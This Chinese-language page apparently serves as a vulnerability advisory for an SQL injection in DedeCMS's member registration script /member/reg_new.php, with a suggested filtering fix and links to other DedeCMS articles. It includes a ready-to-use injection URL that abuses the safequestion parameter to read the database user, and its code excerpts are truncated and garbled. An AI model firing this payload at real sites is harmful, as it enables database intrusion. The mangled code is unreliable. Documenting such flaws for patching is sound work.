首页 >

织梦DedeCMS /member/reg_new.php SQL注入漏洞

1. 漏洞描述

织梦DedeCMS /member/reg_new.php SQL注入漏洞

Dedecms会员中心注入漏洞

2. 漏洞触发条件

/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=//把vdcode=slum改成当前的验证码


3. 漏洞影响范围

4. 漏洞代码分析

/member/reg_new.php

..$jointime = time();$logintime = time();$joinip = GetIP();$loginip = GetIP();$pwd = md5($userpwd); $spaceSta = ($cfg_mb_spacesta ExecuteNoneQuery($inQuery))..


5. 防御方法

/member/reg_new.php

..$jointime = time();$logintime = time();$joinip = GetIP();$loginip = GetIP();$pwd = md5($userpwd);/* 对$mtype | $safeanswer | $safequestion进行有效过滤 */    $mtype = HtmlReplace($mtype,1);    $safeanswer = HtmlReplace($safeanswer);    $safequestion = HtmlReplace($safequestion);/* */$spaceSta = ($cfg_mb_spacesta ExecuteNoneQuery($inQuery)){..



织梦DedeCMS /member/reg_new.php SQL注入漏洞
  • 织梦DedeCMS后台文章列表显示无法找到该页的解决办法
  • 织梦DedeCMS后台文章列表显示无法找到该页的解决办法 | 织梦DedeCMS后台文章列表显示无法找到该页的解决办法 ...

    织梦DedeCMS /member/reg_new.php SQL注入漏洞
  • 织梦DedeCMS模板防盗方法
  • 织梦DedeCMS模板防盗方法 | 织梦DedeCMS模板防盗方法 ...

    织梦DedeCMS /member/reg_new.php SQL注入漏洞
  • 织梦DedeCMS默认模板中焦点图flash的修改方法
  • 织梦DedeCMS默认模板中焦点图flash的修改方法 | 织梦DedeCMS默认模板中焦点图flash的修改方法 ...